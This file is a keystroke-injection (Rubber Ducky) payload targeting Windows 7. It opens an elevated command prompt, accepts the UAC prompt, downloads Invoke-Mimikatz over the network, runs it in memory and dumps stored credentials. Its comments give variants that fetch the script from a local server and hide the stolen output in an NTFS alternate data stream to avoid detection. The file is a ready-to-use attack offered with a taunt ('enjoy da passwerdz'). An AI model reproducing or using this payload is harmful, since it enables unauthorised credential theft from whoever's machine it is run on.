REM **************************************************
REM Payload: Download and execute Mimikatz in memory
REM Target: Window 7
REM Author: Charles Worrell
REM Based on UAC bypass by Darren Kitchen
REM Invoke-Mimikatz from PowerSploit by Joe Bialek
REM **************************************************
DELAY 1000
GUI r
DELAY 3000
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM Tried to combine with Start-Process above but it wasnt working. Will need to revisit...
STRING powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds
ENTER
STRING enjoy da passwerdz :)
REM **************************************************
REM Alternate piping of output
REM **************************************************
REM ** Pipe output to a file on desktop. Send it to an alternate data stream so its not as easy to find :)
REM ** To open up the ADS: notepad %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt
REM ** If someone happens to open NewTextDocument.txt (notepad %USERPROFILE%\Desktop\NewTextDocument.txt) they wont see anything. Need streams to detect.
REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds > %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt 2>&1
REM *** Just dump output in command window
REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds
